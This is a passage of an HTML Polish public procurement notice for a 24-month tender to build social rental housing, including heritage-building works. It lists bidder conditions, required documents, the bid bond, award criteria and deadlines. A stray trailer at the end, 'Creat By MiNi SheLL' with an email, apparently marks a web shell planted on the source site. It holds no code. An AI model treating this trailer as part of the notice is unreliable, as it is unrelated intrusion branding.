              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 24<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                1. Wykonawca spełni warunek jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, w kwocie nie mniejszej niż 10% wartości swej oferty brutto;
2. Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 2.000.000,00 zł (słownie zł: dwa miliony złotych).
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, w szczególności: 
a)co najmniej jedną osobą pełniącą funkcję Kierownika Budowy stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej, co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków oraz będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa;
b) co najmniej jedną osobą pełniącą funkcję Kierownika robót elektrycznych stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształceni techniczne i uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz będącą członkiem właściwej terytorialnie Izby Inżynierów;
c) co najmniej jedną osobą pełniącą funkcję Kierownika robót instalacji sanitarnej stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz będącą członkiem właściwej terytorialnie Izby Inżynierów. 
2.Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przed upływem terminu składania ofert: 
a) wykonał należycie co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych związanych z przebudową lub remontem obiektu wpisanego do rejestru zabytków lub posiadającego elementy podlegające ochronie konserwatorskiej o charakterze i złożoności porównywalnej z zamówieniem o wartości co najmniej 2.000.000,00 zł brutto (słownie zł: dwa miliony złotych);
b)wykonał należycie co najmniej dwa zamówienia, których przedmiotem były roboty budowlane polegające na budowie lub przebudowie obiektu o charakterze i złożoności porównywalnej z zamówieniem (np. wielorodzinny budynek mieszkalny) o wartości co najmniej 3.000.000,00 zł brutto (słownie zł: trzy miliony złotych) każdy.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Imiona i nazwiska osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych i doświadczeniu tych osób Wykonawca zobowiązany jest podać w Załączniku nr 3 do specyfikacji istotnych warunków zamówienia (Wykaz osób skierowanych do realizacji zamówienia).  </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłaceniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności i wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnieni, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
b)zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 Ustawy.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, na kwotę nie mniejszą niż 10 % wartości swej oferty brutto;
b)	dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2.000.000,00 zł (słownie zł: dwa miliony złotych);
c)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z treścią załącznika nr 3 SIWZ;
d)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone - zgodnie z treścią załącznika nr 4 SIWZ. 
Dowodami, o których mowa w pkt. d), są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Warunkiem udziału w przetargu jest wniesienie wadium w wysokości 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych).</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>80</td></tr><tr><td>okres gwarancji</td><td>10</td></tr><tr><td>doświadczenie osoby pełniącej funkcję Kierownika budowy</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zakres, charakter zmian oraz warunki wprowadzenia zmian do umowy opisane są w specyfikacji istotnych warunków zamówienia. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta musi być sporządzona w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Przedmiot zamówienia obejmuje budowę budynku z mieszkaniami na wynajem w oparciu o program społecznego budownictwa czynszowego, realizowany na gruncie Ustawy z dnia 26 października 1995 r. o niektórych formach popierania budownictwa mieszkaniowego. Realizacja zadania nastąpi w przypadku uzyskania przez Zamawiającego finansowania zwrotnego z rządowego programu popierania budownictwa mieszkaniowego na przedsięwzięcie będące przedmiotem zamówienia. W przypadku nieuzyskania ww. finansowania Zamawiający zastrzega sobie prawo odstąpienia od umowy, a Wykonawca nie będzie dochodził od Zamawiającego żadnych roszczeń związanych z tym odstąpieniem od umowy.</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com